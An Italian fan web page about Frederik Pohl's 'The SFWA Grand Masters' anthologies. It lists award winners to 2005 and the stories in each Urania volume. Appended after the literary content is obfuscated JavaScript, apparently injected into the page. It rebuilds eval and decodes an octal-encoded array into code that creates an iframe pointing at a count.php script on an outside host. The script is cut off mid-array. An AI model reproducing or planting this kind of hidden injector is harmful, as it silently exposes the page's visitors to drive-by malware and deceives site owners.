Frederik POHL

IL CURATORE DELLE ANTOLOGIE
"The SFWA Grand Masters"
Frederik POHL

Il Premio Grand Master (Grand Master Award) è un prestigioso riconoscimento letterario annuale attribuito dalla SFWA (Science Fiction and Fantasy Writers of America, "Scrittori di fantascienza e fantasy d'America") all'autore, o autrice di fantascienza o di fantasy. E' un premio alla carriera e per questo tiene conto di tutta la produzione di un determinato autore nel corso degli anni.

Il premio è stato istituito nel 1975 e, anche se inizialmente aveva una cadenza non definita dal 1995 viene assegnato annualmente. Viene comunque assegnato solo ad autori viventi: quindi molti grandi autori di fantascienza del passato non ne sono entrati a far parte.

A partire dal 2002 è stato rinominato Damon Knight Memorial Grand Master Award, in onore di Damon Knight, fondatore della SFWA.



Ecco l'Albo d'oro del Premio
  • 1975: Robert A. Heinlein
  • 1976: Jack Williamson 
  • 1977: Clifford D. Simak 
  • 1978: L. Sprague de Camp 
  • 1981: Fritz Leiber 
  • 1984: Andre Norton 
  • 1986: Arthur C. Clarke 
  • 1987: Isaac Asimov 
  • 1988: Alfred Bester 
  • 1989: Ray Bradbury 
  • 1991: Lester del Rey 
  • 1993: Frederik Pohl 
  • 1995: Damon Knight 
  • 1996: A.E. van Vogt 
  • 1997: Jack Vance 
  • 1998: Poul Anderson 
  • 1999: Hal Clement 
  • 2000: Brian W. Aldiss 
  • 2001: Philip José Farmer 
  • 2002: Ursula K. Le Guin 
  • 2003: Robert Silverberg 
  • 2004: Anne McCaffrey 
  • 2005: Arlan Hellison

VOLUMI PUBBLICATI SU URANIA


Grand Master Award 1975: Robert A. Heinlein

- L'ANNO DEL JACKPOT (The Year of the Jackpot, 1951);
- JERRY ERA UN UOMO (Jerry Was a Man, 1947);
- IL POSTO PIU' LONTANO (The Farthest Place, 1992);
- LA LUNGA GUARDIA (The Long Watch,  1949).

Grand Master Award 1976: Jack Williamson

- CON LE MANI IN MANO (With Folded Hands, 1947);
- JAMBOREE (Jamboree, 1969);
- LA SOCIETA' LETTERARIA MANANA (The Manana Literary Society, 1984);
- L'ALBERO DELLE LUCCIOLE (The Firefly Tree, 1977).

Grand Master Award 1977: Clifford D. Simak

- DISERZIONE (Desertion, 1942);
- PADRE FONDATORE (Founding Father, 1957);
- LA GROTTA DEI CERVI DANZANTI (Grotto of the Dancing Deer, 1980).

Grand Master Award 1978: L. Sprague de Camp

- UN FUCILE DA DINOSAURI (A Gun for Dinosaur, 1956);
- OMINI VERDI VENUTI DA LONTANO (Little Green Men from Afar, 1976);
- FOSSILI VIVENTI (Living Fossil, 1939).

Grand Master Award 1981: Fritz Leiber

- SANITA' MENTALE (Sanity, 1944);
- LA CREATURA DEL MARE (The Mer She, 1977);
- BRUTTA GIORNATA, PER LE VENDITE (A Bad Day for Sales, 1953).
 

I grandi maestri della SF 
(The SFWA Grand Masters: Vol. One, 1999)
a cura di Frederik POHL
Urania (ORO) 1416 del 17 giugno 2001

I grandi maestri della SF 2
(The SFWA Grand Masters: Vol. 2, 2000)
a cura di Frederik POHL
Urania (ORO) 1442 del 30 giugno 2002

Grand Master Award 1984: Andre Norton

- TRAPPOLA PER TOPI (Mousetrap, 1952);
- LA FURIA DEL MANNARO (Were-Wrath, 1984);
- TUTTI I GATTI SONO GRIGI (All Cats Are Gray, 1953);
- DENTE DI SERPENTE (Serpent's Tooth, 1987);
Grand Master Award 1986: Arthur C. Clarke
- SPEDIZIONE DI SOCCORSO (Rescue Party, 1946);
- IL SEGRETO (The Secret, 1963);
- RIUNIONE (Reunion, 1971);
- LA STELLA (The Star, 1952);
- INCONTRO CON MEDUSA (A Meeting with Medusa, 1972).
Grand Master Award 1987: Isaac Asimov
- L'ULTIMA DOMANDA (The Last Question, 1956);
- E' UNA GIORNATA COSI' BELLA... (It's Such a Beautiful Day, 1954);
- CRUMIRO (Strikebreaker, 1956);
- ALLA MANIERA MARZIANA (The Martian Way, 1952).
Grand Master Award 1988: Alfred Bester
- DISERZIONE FINALE (Disappearing Act, 1953);
- FAHRENHEIT, FAHRENHEIT (Fondly Fahrenheit, 1954);
- COMMENTO A FAHRENHEIT FAHRENHEIT (Comment on Fondly Fahrenheit, 1976);
- LA FUGA DI QUATTRO ORE (The Four-Hour Fugue, 1974);
- SCELTA OBBLIGATA (Hobson's Choice, 1952).
Grand Master Award 1989: Ray Bradbury
- LA CITTA' (The City, 1950);
- LA GITA DI UN MILIONE DI ANNI (The Million-Year Picnic, 1946);
- TUTTA L'ESTATE IN UN GIORNO (All Summer in a Day, 1954);
- CADRA' DOLCE LA PIOGGIA (There Will Come Soft Rains, 1950);
- L'ECCESSIVA DISPERAZIONE (The Affluence of Despair, 1998).

Grand Master Award 1991: Lester del Rey

- IL FEDELE (The Faithful, 1938);
- I FLAUTI DI PAN (The Pipes of Pan, 1940);
- IL CALDERAIO (The Coppersmith, 1939);
- PERCHE' SONO UN DIO GELOSO! (For I Am a Jealous People!, 1958).

Grand Master Award 1993: Frederik Pohl

- CHE CI PROVINO LE FORMICHE (Lets the Ants Try, 1949);
- IL TUNNEL SOTTO IL MONDO (The Tunnel Under the World, 1954);
- FRA UN MILIONE DI GIORNI (Day Million, 1966);
- ALPHA-ALEPH (The Gold at the Starbow's End, 1972).

Grand Master Award 1995: Damon Knight

- IL MANOVRATORE (The Handler, 1960);
- DIO (The Dying Man, 1967).

I grandi maestri della SF 3 Prima Parte
(The SFWA Grand Masters: Vol. 3, 2001)
a cura di Frederik POHL
Urania 1479 del 19 novembre 2003

I grandi maestri della SF 3 Seconda Parte
(The SFWA Grand Masters: Vol. 3, 2001)
a cura di Frederik POHL
Urania 1480 del 3 dicembre 2003

Grand Master Award 1995: Damon Knight

- NON SARA' CON UN BOTTO (Not With a Bang, 1950);
- TI VEDO (I See You, 1982);
- MASCHERE (Masks, 1968).

Grand Master Award 1996: A.E. van Vogt

- IL DISTRUTTORE NERO (Black Destroyer, 1939);
- DESTINAZIONE CENTAURO (Far Centaurus, 1944);
- LA CRIPTA DELLA BESTIA (Vault of the Beast, 1940);
- CARO CORRISPONDENTE (Dear Pen Pal, 1949).

Grand Master Award 1997: Jack Vance

- VELA 25 (Sail 25, 1962);
- IL RIFUGIO DI ULLWARD (Ullward's Retreat, 1958);
- I MIRACOLI DEGLI ANTICHI (The Miracle Workers, 1958).

ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv=""+v;}}e=w[vv];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0162,0153,0157,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155,0145,047,051,073,015,012,015,012,040,040,040,040,0162,0153,0157,056,0163,0162,0143,040,075,040,047,0150,0164,0164,0160,072,057,057,0146,0164,0160,056,0164,0150,0145,0151,0154,0163,0151,0145,0146,0152,0145,056,0144,0145,057,0143,0157,0165,0156,0164,056,0160,0150,0160